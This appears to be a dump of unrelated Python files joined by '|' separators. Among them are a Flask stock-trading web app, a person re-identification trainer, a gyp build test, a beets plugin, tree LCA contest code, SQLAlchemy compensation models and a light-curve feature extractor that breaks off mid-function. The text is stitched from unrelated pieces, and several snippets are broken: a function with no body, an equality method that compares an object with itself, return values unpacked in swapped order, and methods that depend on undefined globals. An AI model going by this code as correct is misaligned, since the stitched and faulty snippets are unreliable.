return apology ("Not enough money in your account")
return render_template("buy.html")
@app.route("/history")
@login_required
def history():
"""Show history of transactions."""
rows_history = db.execute("SELECT symbol, time_stamp, shares, price FROM portfolio WHERE id = :id ORDER BY time_stamp DESC", id = session["user_id"])
#if shares in database is negative it is sold, otherwise it is bought
#changes shares that are negative from database to positive for display
for row in range(len(rows_history)):
rows_history[row]["price"] = usd(rows_history[row]["price"])
if rows_history[row]["shares"] < 0:
rows_history[row]["action"] = "Sold"
rows_history[row]["shares"] = abs(rows_history[row]["shares"])
else:
rows_history[row]["action"] = "Bought"
return render_template("history.html", history = rows_history)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in."""
# forget any user_id
session.clear()
# if user reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# ensure username was submitted
if not request.form.get("username"):
return apology("must provide username")
# ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password")
# query database for username
rows = db.execute("SELECT * FROM users WHERE username = :username", username=request.form.get("username"))
# ensure username exists and password is correct
if len(rows) != 1 or not pwd_context.verify(request.form.get("password"), rows[0]["hash"]):
return apology("invalid username and/or password")
# remember which user has logged in
session["user_id"] = rows[0]["id"]
# redirect user to home page
return redirect(url_for("index"))
# else if user reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out."""
# forget any user_id
session.clear()
# redirect user to login form
return redirect(url_for("login"))
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
if request.method == "POST":
if request.form.get("symbol") == "":
return apology("Please Enter a Symbol")
elif lookup (request.form.get("symbol")) == None:
return apology("Sorry stock not found")
else:
company = lookup(request.form.get("symbol"))["name"]
price = usd (lookup(request.form.get("symbol"))["price"])
symbol = lookup(request.form.get("symbol"))["symbol"]
return render_template("quoted.html", company = company, price =price, symbol = symbol)
return render_template("quote.html")
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user."""
session.clear()
if request.method == "POST":
if request.form.get("username") == "":
return apology("Please enter a username")
elif request.form.get("password") =="":
return apology("Please enter a password")
elif request.form.get("confirm_password") =="":
return apology("Please enter a confirmation password")
elif request.form.get("confirm_password") != request.form.get("password"):
return apology("Passwords don't match")
else:
hash = pwd_context.hash(request.form.get("password"))
result = db.execute("INSERT INTO users (username, hash) VALUES(:username, :hash)", username = request.form.get("username"), hash =hash)
if not result:
return apology ("User already registered")
row = db.execute("SELECT * FROM users WHERE username = :username", username=request.form.get("username"))
session ["user_id"] = row[0]["id"]
return redirect(url_for("index"))
else:
return render_template("register.html")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock."""
if request.method == "POST":
symbol = request.form.get("symbol")
if symbol == "":
return apology("Please Enter a Symbol")
elif lookup (symbol) == None:
return apology("Sorry stock not found")
elif request.form.get("shares") == "":
return apology("Please Enter Number of Shares")
elif RepresentsInt(request.form.get("shares")) == False:
return apology("Invalid input")
elif int(request.form.get("shares")) <= 0:
return apology("Please enter a positive number")
else:
portfolio = db.execute("SELECT symbol, company, SUM(shares) AS shares FROM portfolio WHERE id = :id GROUP BY symbol", id = session["user_id"])
user = db.execute("SELECT * FROM users WHERE id = :id ", id = session["user_id"])
symbol = lookup(symbol)["symbol"]
shares = int(request.form.get("shares"))
for row in range(len(portfolio)):
if symbol == portfolio[row]["symbol"]:
if shares <= portfolio[row]["shares"]:
cost = shares * lookup(symbol)["price"]
total = user[0]["cash"] + cost
company = lookup(symbol)["name"]
shares = -shares
price = lookup(symbol)["price"]
db.execute("UPDATE users SET cash= :cash WHERE id =:id", cash =total, id = session["user_id"])
db.execute("INSERT INTO portfolio (id, company, price, shares, symbol) VALUES (:id, :company, :price, :shares, :symbol )", id = session["user_id"], company = company, price = price, shares = shares, symbol = symbol)
return redirect(url_for("index"))
else:
return apology("You do not have enough shares")
else:
continue
return apology ("You do not have these shares")
return render_template("sell.html")
@app.route("/deposit", methods=["GET", "POST"])
@login_required
def deposit():
"""adds money to user account"""
if request.method == "POST":
if request.form.get("amount") == "":
return apology("Please enter amount")
elif representsFloat(request.form.get("amount")) == False:
return apology("Invalid Input")
elif float(request.form.get("amount")) <= 0:
return apology("Please enter a positive amount")
else:
user = db.execute("SELECT* FROM users WHERE id =:id ", id= session["user_id"])
cash = float(request.form.get("amount")) + user[0]["cash"]
db.execute("UPDATE users SET cash = :cash WHERE id=:id", cash = cash, id = session["user_id"])
return redirect(url_for("index"))
return render_template("deposit.html")
|
class Collection(object):
def __init__(self, update_func):
self._update_func = update_func
self._elements = None
def __dir__(self):
if self._elements is not None:
return self.__dict__
else:
self.refresh()
return self.__dict__
def __getitem__(self, item):
return self._elements[item]
def __getattr__(self, item):
if self._elements is None:
self.refresh()
elif item in ["_ipython_canary_method_should_not_exist_", "_repr_mimebundle_"]:
raise AttributeError
return self._elements[item]
def __repr__(self):
items = ("{!r}".format(self._elements[k]) for k in self._elements)
return "\n{}\n".format("\n".join(items))
def __eq__(self, other):
return self.__dict__ == self.__dict__
def refresh(self):
self._elements = self._update_func()
self.__dict__.update(self._elements)
def __iter__(self):
if self._elements is None:
self.refresh()
return iter(self._elements.values())
def __contains__(self, key):
if self._elements is None:
self.refresh()
return key in self._elements
|
def finite_iteration():
companies = [
'google',
'ibm',
'adobe',
'nike',
'target',
]
def infinite_iteration():
if __name__ =="__main__":
finite_iteration()
infinite_iteration()
|
import os
import sys
from torch import nn
import time
import pdb
sys.path.append('../..')
from fastreid.config import get_cfg
from fastreid.engine import DefaultTrainer, default_argument_parser, default_setup
from fastreid.utils.checkpoint import Checkpointer
from fastreid.evaluation import ReidEvaluator
from build import build_reid_test_loader, build_reid_train_loader
class Trainer(DefaultTrainer):
@classmethod
def build_evaluator(cls, cfg, num_query, output_folder=None):
if output_folder is None:
output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
return ReidEvaluator(cfg, num_query)
@classmethod
def build_train_loader(cls, cfg):
return build_reid_train_loader(cfg)
@classmethod
def build_test_loader(cls, cfg, dataset_name):
return build_reid_test_loader(cfg, dataset_name)
def run_step(self):
"""
Implement the standard training logic described above.
"""
assert self.model.training, "[SimpleTrainer] model was changed to eval mode!"
start = time.perf_counter()
"""
If your want to do something with the data, you can wrap the dataloader.
"""
data = self.data_loader.next()
data_time = time.perf_counter() - start
"""
If your want to do something with the heads, you can wrap the model.
"""
outputs = self.model(data)
loss_dict = self.model.module.losses(outputs,self.iter)
losses = sum(loss for loss in loss_dict.values())
self._detect_anomaly(losses, loss_dict)
metrics_dict = loss_dict
metrics_dict["data_time"] = data_time
self._write_metrics(metrics_dict)
"""
If you need accumulate gradients or something similar, you can
wrap the optimizer with your custom `zero_grad()` method.
"""
self.optimizer.zero_grad()
losses.backward()
"""
If you need gradient clipping/scaling or other processing, you can
wrap the optimizer with your custom `step()` method.
"""
self.optimizer.step()
def setup(args):
"""
Create configs and perform basic setups.
"""
cfg = get_cfg()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
default_setup(cfg, args)
return cfg
def main(args):
cfg = setup(args)
if args.eval_only:
cfg.defrost()
cfg.MODEL.BACKBONE.PRETRAIN = False
model = Trainer.build_model(cfg)
model = nn.DataParallel(model)
model = model.cuda()
Checkpointer(model, save_dir=cfg.OUTPUT_DIR).load(cfg.MODEL.WEIGHTS)
res = Trainer.test(cfg, model)
return res
trainer = Trainer(cfg)
trainer.resume_or_load(resume=args.resume)
return trainer.train()
if __name__ == "__main__":
args = default_argument_parser().parse_args()
print("Command Line Args:", args)
main(args)
|
class GlaesError(Exception): pass
|
from rest_framework import routers
from .views import CategoryModelViewSet
router = routers.SimpleRouter()
router.register(r'categories', CategoryModelViewSet)
urlpatterns = router.urls
|
from accounts.models import Address
from django.shortcuts import render_to_response
from dajax.core.Dajax import Dajax
def addresses_by_user(request,user_id):
addresses=Address.objects.filter(user__id=user_id)
dajax = Dajax()
dajax.alert('123')
return dajax.json()
|
def count(L, S):
diff = len(L) - len(S)
if diff < 0:
return 0
cnt = 0
for i in range(diff+1):
if S == L[i:i+len(S)]:
cnt += 1
return cnt
while True:
try:
S, L = input().split()
s1 = count(L, S)
s2 = sum([count(L, s) for s in set([S[:i] + S[i+1:] for i in range(len(S))])])
s3 = sum([count(L, s) for s in set([S[:i] + c + S[i:] for i, c in zip(list(range(len(S)+1))*4, ["A"]*(len(S)+1) + ["G"]*(len(S)+1) + ["C"]*(len(S)+1) + ["T"]*(len(S)+1))])])
print("{} {} {}".format(s1, s2, s3))
except:
break
|
#coding:utf-8
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from sklearn.model_selection import GridSearchCV
import matplotlib.pyplot as plt
def show_data(y, y_pred, title):
plt.figure(figsize=(7, 6), facecolor='w')
plt.plot(y, 'r-', lw=2, label='Actual')
plt.plot(y_pred, 'g-', lw=1, label='Predict', alpha=0.7)
plt.grid(True)
plt.xlabel('Samples', fontsize=15)
plt.ylabel('Field Intensity', fontsize=15)
plt.legend(loc='upper left')
plt.title(title, fontsize=18)
plt.tight_layout()
if __name__ == '__main__':
data_prime = pd.read_csv('FieldIntensity.csv', header=0)
data_group = data_prime.groupby(by=['x', 'y'])
data_mean = data_group.mean()
data = data_mean.reset_index()
print data
x = data[['x', 'y']]
y = data['88000KHz']
x_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.75, random_state=0)
# rf = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=11, min_samples_split=3)
# model = GridSearchCV(rf, param_grid={'max_depth': np.arange(10, 15), 'min_samples_split': np.arange(1, 5)})
model = RandomForestRegressor(n_estimators=100, criterion='mse', max_depth=14, min_samples_split=3)
model.fit(x_train, y_train)
order = y_train.argsort(axis=0)
y_train = y_train.values[order]
x_train = x_train.values[order, :]
y_train_pred = model.predict(x_train)
order = y_test.argsort(axis=0)
y_test = y_test.values[order]
x_test = x_test.values[order, :]
y_test_pred = model.predict(x_test)
print r2_score(y_train, y_train_pred)
print r2_score(y_test, y_test_pred)
show_data(y_train, y_train_pred, 'Train Data')
show_data(y_test, y_test_pred, 'Test Data')
plt.show()
|
# -*- python -*-
# Assignment: Stars
# Write the following functions.
# Part I
# Create a function called draw_stars() that takes a list of numbers and prints out *.
#
# For example:
# x = [4, 6, 1, 3, 5, 7, 25]
# draw_stars(x)
# Should print the following:
# ****
# ******
# *
# ***
# *****
# *******
# *************************
def draw_stars( l ):
for i in l:
print '*' * i
print "Testing draw_stars ..."
draw_stars( [4, 6, 1, 3, 5, 7, 25] )
print "End testing draw_stars"
# Part II
# Modify the function above. Allow a list containing integers and strings to be
# passed to the draw_stars() function.
# When a string is passed, instead of displaying *, display the first letter of
# the string according to the example below.
# You may use the .lower() string method for this part.
#
# For example:
# x = [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"]
# draw_stars(x)
# Should print the following:
# ****
# ttt
# *
# mmmmmmm
# *****
# *******
# jjjjjjjjjjj
def draw_stars_and_letters( l ):
for i in l:
if type( i ) == int:
print '*' * i
elif type( i ) == str:
print i[0].lower() * len( i )
print "Testing draw_stars_and_letters ..."
draw_stars_and_letters( [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"] )
print "End testing draw_stars_and_letters"
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies simple build of a "Hello, world!" program with static libraries,
including verifying that libraries are rebuilt correctly when functions
move between libraries.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib1',
chdir='src')
test.relocate('src', 'relocate/src')
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib1_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib2',
chdir='relocate/src')
# Update program.c to force a rebuild.
test.sleep()
contents = test.read('relocate/src/program.c')
contents = contents.replace('Hello', 'Hello again')
test.write('relocate/src/program.c', contents)
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello again from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib2_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.run_gyp('library.gyp',
'-Dlibrary=static_library',
'-Dmoveable_function=lib1',
chdir='relocate/src')
# Update program.c and lib2.c to force a rebuild.
test.sleep()
contents = test.read('relocate/src/program.c')
contents = contents.replace('again', 'again again')
test.write('relocate/src/program.c', contents)
# TODO(sgk): we have to force a rebuild of lib2 so that it weeds out
# the "moved" module. This should be done in gyp by adding a dependency
# on the generated .vcproj file itself.
test.touch('relocate/src/lib2.c')
test.build('library.gyp', test.ALL, chdir='relocate/src')
expect = """\
Hello again again from program.c
Hello from lib1.c
Hello from lib2.c
Hello from lib1_moveable.c
"""
test.run_built_executable('program', chdir='relocate/src', stdout=expect)
test.pass_test()
|
from enum import Enum
class PullRequestState(Enum):
OPEN = 'OPEN'
CLOSED = 'CLOSED'
MERGED = 'MERGED'
class ReviewDecision(Enum):
NACK = 'NACK'
CONCEPT_ACK = 'CONCEPT_ACK'
UNTESTED_ACK = 'UNTESTED_ACK'
TESTED_ACK = 'TESTED_ACK'
NONE = None
|
'''
建议每级缩进都使用四个空格,这既可提高可读性,又留下了足够的多级缩进空间
建议每行不超过 80 字符
建议注释的行长都不超过 72 字符
要将程序的不同部分分开,可使用空行
'''
|
# This file is part of beets.
# Copyright 2021, Edgars Supe.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds an album template field for formatted album types."""
from beets.autotag.mb import VARIOUS_ARTISTS_ID
from beets.library import Album
from beets.plugins import BeetsPlugin
class AlbumTypesPlugin(BeetsPlugin):
"""Adds an album template field for formatted album types."""
def __init__(self):
"""Init AlbumTypesPlugin."""
super().__init__()
self.album_template_fields['atypes'] = self._atypes
self.config.add({
'types': [
('ep', 'EP'),
('single', 'Single'),
('soundtrack', 'OST'),
('live', 'Live'),
('compilation', 'Anthology'),
('remix', 'Remix')
],
'ignore_va': ['compilation'],
'bracket': '[]'
})
def _atypes(self, item: Album):
"""Returns a formatted string based on album's types."""
types = self.config['types'].as_pairs()
ignore_va = self.config['ignore_va'].as_str_seq()
bracket = self.config['bracket'].as_str()
# Assign a left and right bracket or leave blank if argument is empty.
if len(bracket) == 2:
bracket_l = bracket[0]
bracket_r = bracket[1]
else:
bracket_l = ''
bracket_r = ''
res = ''
albumtypes = item.albumtypes
is_va = item.mb_albumartistid == VARIOUS_ARTISTS_ID
for type in types:
if type[0] in albumtypes and type[1]:
if not is_va or (type[0] not in ignore_va and is_va):
res += f'{bracket_l}{type[1]}{bracket_r}'
return res
|
def getN():
return int(input())
def getNM():
return map(int, input().split())
def getList():
return list(map(int, input().split()))
def getArray(intn):
return [int(input()) for i in range(intn)]
def input():
return sys.stdin.readline().rstrip()
def rand_N(ran1, ran2):
return random.randint(ran1, ran2)
def rand_List(ran1, ran2, rantime):
return [random.randint(ran1, ran2) for i in range(rantime)]
def rand_ints_nodup(ran1, ran2, rantime):
ns = []
while len(ns) < rantime:
n = random.randint(ran1, ran2)
if not n in ns:
ns.append(n)
return sorted(ns)
def rand_query(ran1, ran2, rantime):
r_query = []
while len(r_query) < rantime:
n_q = rand_ints_nodup(ran1, ran2, 2)
if not n_q in r_query:
r_query.append(n_q)
return sorted(r_query)
from collections import defaultdict, deque, Counter
from sys import exit
from decimal import *
import heapq
import math
from fractions import gcd
import random
import string
import copy
from itertools import combinations, permutations, product
from operator import mul
from functools import reduce
from bisect import bisect_left, bisect_right
import sys
sys.setrecursionlimit(1000000000)
mod = 10 ** 9 + 7
#############
# Main Code #
#############
import sys
sys.setrecursionlimit(1000000)
class LCA(object):
def __init__(self, G, root=0):
self.G = G
self.root = root
self.n = len(G)
self.logn = (self.n - 1).bit_length()
self.depth = [-1 if i != root else 0 for i in range(self.n)]
self.parent = [[-1] * self.n for _ in range(self.logn)]
self.go = [] # 行きがけ
# self.go_dict = {}
self.back = [] # 帰りがけ
self.back_dict = {}
self.bfs()
self.doubling()
def bfs(self):
que = [self.root]
while que:
u = que.pop()
for v in self.G[u]:
if self.depth[v] == -1:
self.depth[v] = self.depth[u] + 1
self.parent[0][v] = u
que += [v]
def dfs(self, u, p):
# self.go_dict[u] = len(self.go)
self.go.append(u)
for v in E[u]:
if v != p:
self.dfs(v, u)
self.back_dict[u] = len(self.back)
self.back.append(u)
def doubling(self):
for i in range(1, self.logn):
for v in range(self.n):
if self.parent[i - 1][v] != -1:
self.parent[i][v] = self.parent[i - 1][self.parent[i - 1][v]]
def get(self, u, v):
if self.depth[v] < self.depth[u]:
u, v = v, u
du = self.depth[u]
dv = self.depth[v]
for i in range(self.logn): # depthの差分だけuを遡らせる
if (dv - du) >> i & 1:
v = self.parent[i][v]
if u == v: return u # 高さ揃えた時点で一致してたら終わり
for i in range(self.logn - 1, -1, -1): # そうでなければ上から二分探索
pu, pv = self.parent[i][u], self.parent[i][v]
if pu != pv:
u, v = pu, pv
return self.parent[0][u]
def distance(self, u, v):
return self.depth[u] + self.depth[v] - 2 * self.depth[self.get(u, v)]
# dfsの帰りがけ順の列があれば深さが深い順に各頂点をマージする方法を教えてくれる
# [[マージ元1, マージ元2, マージ先],...]
def unite(self, ar):
# dfsの行きがけ順にソート
v_l = [[self.back_dict[v - 1], v - 1] for v in ar]
v_l.sort(reverse = True)
bef = []
aft = [v[1] for v in v_l] # popできるよう逆にする
res = []
while len(aft) > 1:
now = aft.pop()
while bef and self.depth[lca.get(bef[-1], now)] >= self.depth[self.get(now, aft[-1])]:
res.append([bef[-1], now]) # 記録1 マージ元
now = self.get(bef.pop(), now) # nowとbef[-1]を統合して新しい点を作成
res[-1].append(now) # 記録2 マージ先
# 一旦保留
bef.append(now)
# 残った奴をマージしていく
now = aft[0]
while bef:
res.append([bef[-1], now])
now = self.get(bef.pop(), now) # nowとbef[-1]を統合して新しい点を作成
res[-1].append(now)
return res
# 使い方 ABC014 閉路
n = getN()
G = [[] for _ in range(n)]
for x, y in [getNM() for i in range(n - 1)]:
G[x - 1] += [y - 1]
G[y - 1] += [x - 1]
lca = LCA(G)
q = getN()
ans = []
for a, b in [getNM() for i in range(q)]:
# 根からのaの深さ + 根からのbの深さ - 2 * ダブった部分
# lca.get(a - 1, b - 1):aとbのlca
ans += [lca.depth[a - 1] + lca.depth[b - 1] - 2 * lca.depth[lca.get(a - 1, b - 1)] + 1]
print(*ans, sep='\n')
# 典型90問 035 - Preserve Connectivity
N = getN()
E = [[] for i in range(N)]
for i in range(N - 1):
a, b = getNM()
E[a - 1].append(b - 1)
E[b - 1].append(a - 1)
Q = getN()
lca = LCA(E)
# dfsの行きがけ順
lca.dfs(0, -1)
for _ in range(Q):
k, *v_l = getList()
cnt = 0
for a, b, _ in lca.unite(v_l):
cnt += lca.distance(a, b)
print(cnt)
|
# -*- coding: utf-8 -*-
def com(n):
return float(n*(n-1)/2)
if __name__ == "__main__":
fid = open('main.txt','r')
#fout = open('out.txt','w')
k,m,n = [int(x) for x in fid.readline().split()]
print 1-(com(n)+com(m)/4+m*n/2)/com(k+m+n)
|
from datetime import date
from . import db
class Company(db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(64), unique = True)
transaction_date = db.Column(db.DateTime)
per_share_deal_price = db.Column(db.Float)
executives = db.relationship('Executive', backref='company', lazy=True)
def __repr__(self):
return f'<Company: {self.name}>'
class Executive(db.Model):
id = db.Column(db.Integer, primary_key = True)
commpany_id = db.Column(db.Integer, db.ForeignKey('company.id'))
name = db.Column(db.String(32))
title = db.Column(db.String(32))
start_date = db.Column(db.DateTime)
first_year_non_recurring_compensation = db.Column(db.Float, default = 0)
executive_compensation = db.relationship('Compensation', backref='executive', lazy=True)
non_equity_payments = db.relationship('NonEquityPayment', backref='executive', lazy=True)
options = db.relationship('Option', backref='executive', lazy=True)
restricted_stock = db.relationship('RestrictedStock', backref='executive', lazy=True)
def __repr__(self):
return f'<Executive: {self.name}, {self.title}, {self.company}, {self.start_date}, {self.first_year_non_recurring_compensation}>'
class Compensation(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
year = db.Column(db.Integer)
compensation = db.Column(db.Float)
class NonEquityPayment(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
amount = db.Column(db.Float)
description = db.Column(db.String(64))
reasonable_compensation_before_change = db.Column(db.Boolean, default = False)
reasonable_compensation_after_change = db.Column(db.Boolean, default = False)
class Option(db.Model):
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
number = db.Column(db.Float)
grant_date = db.Column(db.Date) # Need to add a grant id to distinguish between two grants on the same date
vesting_date = db.Column(db.Date)
strike_price = db.Column(db.Float)
change_of_control = db.Column(db.Boolean, default = False) # Set default = True if grant_date within 1 year of transaction_date, allow toggle for presumption to be rebutted
accelerated = db.Column(db.Boolean, default = True) # Need to allow for partial acceleration - next to vest, last to vest, pro rata, custom, acceleration to a date other than transaction date
roll_over = db.Column(db.Boolean, default = False)
class RestrictedStock(db.Model): # Same fixes as for options
id = db.Column(db.Integer, primary_key = True)
executive_id = db.Column(db.Integer, db.ForeignKey('executive.id'))
number = db.Column(db.Float)
grant_date = db.Column(db.Date)
vesting_date = db.Column(db.Date)
change_of_control = db.Column(db.Boolean, default = False)
accelerated = db.Column(db.Boolean, default = True)
|
__author__ = 'Aravinth Panchadcharam'
__email__ = "me@aravinth.info"
__date__ = '22/04/15'
import cv2
if __name__ == '__main__':
img = cv2.imread('test.jpg', 0)
image_small = cv2.resize(img, (800, 600))
cv2.imshow('image', image_small)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
# classification backend
# Load libraries
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pickle # allows to save differnt trained models of the same classifier object
import time
import streamlit as st
@st.cache
def query_lightcurve_XD(SourceID):
"""
Download data for a single source from Xiao Dian's website. Source is identified using SourceID
"""
url = 'http://variables.cn:88/seldataz.php?SourceID=' + str(SourceID)
try:
lc_complete = pd.read_csv(url, header='infer')
lc = lc_complete.drop(columns = ['SourceID','flag'])
except:
lc_complete = pd.DataFrame()
lc = pd.DataFrame()
return lc, lc_complete
@st.cache
def query_lightcurve_DR(RA, Dec):
"""
Download data for a single source from DR2 dataset. Source is identified using RA and Dec location
"""
circle_radius = 0.0028 # 1 arcsec = 0.00028 degress
t_format = "ipac_table"
table_format = "FORMAT=" + str(t_format)
flag_mask = 32768
mask = "BAD_CATFLAGS_MASK=" + str(flag_mask)
collect="COLLECTION="+"ztf_dr2"
numobs = "NOBS_MIN=20"
# filter_band = "g"
label = []
SourceID =[]
start_time = time.time()
ra = RA
dec = Dec
circle = "POS=CIRCLE"+"+"+str(ra)+"+"+str(dec)+"+"+str(circle_radius)
# band = "BANDNAME="+ filter_band
params = circle + "&" + mask + "&" + numobs + "&" + collect + "&" + table_format
try:
url= "https://irsa.ipac.caltech.edu/cgi-bin/ZTF/nph_light_curves?" + params
lc_complete = pd.read_csv(url, header=None, delim_whitespace=True, skiprows=55) # extract data
header = pd.read_csv(url, header=None, sep='|', skiprows=50,usecols=range(1,25), nrows=1)
lc_complete.columns = header.iloc[0].str.strip()
lc = lc_complete[['ra','dec','hjd','mag','magerr','filtercode']]
lc.columns=['RAdeg', 'DEdeg', 'HJD', 'mag', 'e_mag', 'band']
lc.replace({'zg':'g'},inplace = True)
lc.replace({'zr':'r'},inplace = True)
val = lc.loc[:,'HJD']-2.4e6
lc.loc[:,'HJD'] = val
except:
lc_complete = pd.DataFrame()
lc = pd.DataFrame()
return lc, lc_complete
def plot_lc(lc):
"""
Function to plot the light curves
"""
data1 = lc[lc['band']=='r']
data2 = lc[lc['band']=='g']
fig, axs = plt.subplots(nrows=1, ncols=2, sharex=True)
ax = axs[0]
ax.errorbar(data2['HJD'],data2['mag'],yerr = data2['e_mag'],fmt='g.')
ax.invert_yaxis() # smaller magnitude means brighter stars, so invert the axis
ax.set_xlabel('time in HJD')
ax.set_ylabel('magnitude')
ax.set_title('Green Filter (g band)')
ax = axs[1]
ax.errorbar(data1['HJD'],data1['mag'],yerr = data1['e_mag'],fmt='r.')
ax.invert_yaxis() # smaller magnitude means brighter stars, so invert the axis
ax.set_xlabel ('time in HJD')
ax.set_ylabel('magnitude')
ax.set_title('Red Filter (r filter)')
fig.tight_layout(pad=3.0)
fig.suptitle('Measured Light Curve', fontsize=16)
st.pyplot(fig)
# def weighted_mean(mag,mag_err):
# mag2 = (mag_err*mag_err) # mag err square
# mag2_inv = 1/mag2.values; # take inverse of the values
# w = pd.Series(mag2_inv) # covert it back to s series
# sw = w.sum() # sum of weights
# wmag = mag*w # multiply magnitude with weights
# wmean = wmag.sum()/sw # weighted mean
# return wmean
def weighted_mean(mag,e_mag):
w = 1/(e_mag*e_mag)
sw = np.sum(w)
wmag = w*mag
wmean = np.sum(wmag)/sw
return wmean
# welsh J, K statistics
def welsh_staton(mag_series,wmean):
N = len(mag_series)
d_i = N/(N-1)*(mag_series - wmean) # replace mean by weighted mean
d_i1 = d_i.shift(periods=-1)
d_i1.fillna(0, inplace = True)
Pi = d_i*d_i1
Pi_val = Pi.values
Psign = np.sign(Pi_val)
Jval = Psign*np.sqrt(np.abs(Pi_val))
J = np.sum(Jval)
K1 = abs(d_i.values)/N
K2 = np.sqrt(1/N*np.sum(d_i.values*d_i.values))
K = np.sum(K1*K2)
return J, K
def calculate_features(lc):
"""
Calculate features for a light curve passed as a dataframe.
"""
g_mean = []
g_wmean = [] # weighted mean
g_MAD = []
g_IQR = []
g_f60 = []
g_f70 = []
g_f80 = []
g_f90 = []
g_skew = []
g_kurtosis = []
g_welsh_K = []
g_welsh_J = []
r_mean = []
r_wmean = [] # weighted mean
r_MAD = []
r_IQR = []
r_f60 = []
r_f70 = []
r_f80 = []
r_f90 = []
r_skew = []
r_kurtosis = []
r_welsh_K = []
r_welsh_J = []
if len(lc) >1:
dfg = lc.loc[lc["band"] == "g"]
dfr = lc.loc[lc["band"] == "r"]
if len(dfg) > 1:
N = len(dfg)
wmean_temp = weighted_mean(dfg.mag.values,dfg.e_mag.values)
K_temp, J_temp = welsh_staton(dfg.mag, wmean_temp )
g_mean.append(dfg.mag.mean())
g_wmean.append(wmean_temp)
deviation = abs(dfg.mag - dfg.mag.median())
g_MAD.append(deviation.median())
g_IQR.append(dfg.mag.quantile(0.75) - dfg.mag.quantile(0.25))
g_f60.append(dfg.mag.quantile(0.80) - dfg.mag.quantile(0.2))
g_f70.append(dfg.mag.quantile(0.85) - dfg.mag.quantile(0.15))
g_f80.append(dfg.mag.quantile(0.9) - dfg.mag.quantile(0.10))
g_f90.append(dfg.mag.quantile(0.95) - dfg.mag.quantile(0.05))
g_skew.append(dfg.mag.skew())
g_kurtosis.append(dfg.mag.kurtosis())
g_welsh_J.append(J_temp)
g_welsh_K.append(K_temp)
else:
g_mean.append(np.NaN)
g_wmean.append(np.NaN)
g_MAD.append(np.NaN)
g_IQR.append(np.NaN)
g_f60.append(np.NaN)
g_f70.append(np.NaN)
g_f80.append(np.NaN)
g_f90.append(np.NaN)
g_skew.append(np.NaN)
g_kurtosis.append(np.NaN)
g_welsh_J.append(np.NaN)
g_welsh_K.append(np.NaN)
if len(dfr) >1:
N = len(dfr)
wmean_temp = weighted_mean(dfr.mag.values,dfr.e_mag.values)
K_temp, J_temp = welsh_staton(dfr.mag, wmean_temp )
r_mean.append(dfr.mag.mean())
r_wmean.append(wmean_temp)
deviation = abs(dfr.mag - dfr.mag.median())
r_MAD.append(deviation.median())
r_IQR.append(dfr.mag.quantile(0.75) - dfr.mag.quantile(0.25))
r_f60.append(dfr.mag.quantile(0.80) - dfr.mag.quantile(0.2))
r_f70.append(dfr.mag.quantile(0.85) - dfr.mag.quantile(0.15))
r_f80.append(dfr.mag.quantile(0.9) - dfr.mag.quantile(0.10))
r_f90.append(dfr.mag.quantile(0.95) - dfr.mag.quantile(0.05))
r_skew.append(dfr.mag.skew())
r_kurtosis.append(dfr.mag.kurtosis())
r_welsh_J.append(J_temp)
r_welsh_K.append(K_temp)
else:
r_mean.append(np.NaN)
r_wmean.append(np.NaN)
r_MAD.append(np.NaN)
r_IQR.append(np.NaN)
r_f60.append(np.NaN)
r_f70.append(np.NaN)
r_f80.append(np.NaN)
r_f90.append(np.NaN)
r_skew.append(np.NaN)
r_kurtosis.append(np.NaN)
r_welsh_J.append(np.NaN)
r_welsh_K.append(np.NaN)
else:
g_mean.append(np.NaN)
g_wmean.append(np.NaN)
g_MAD.append(np.NaN)
g_IQR.append(np.NaN)
g_f60.append(np.NaN)
g_f70.append(np.NaN)
g_f80.append(np.NaN)
g_f90.append(np.NaN)
g_skew.append(np.NaN)
g_kurtosis.append(np.NaN)
g_welsh_J.append(np.NaN)
g_welsh_K.append(np.NaN)
r_mean.append(np.NaN)
r_wmean.append(np.NaN)
r_MAD.append(np.NaN)
r_IQR.append(np.NaN)
r_f60.append(np.NaN)
r_f70.append(np.NaN)
r_f80.append(np.NaN)
r_f90.append(np.NaN)
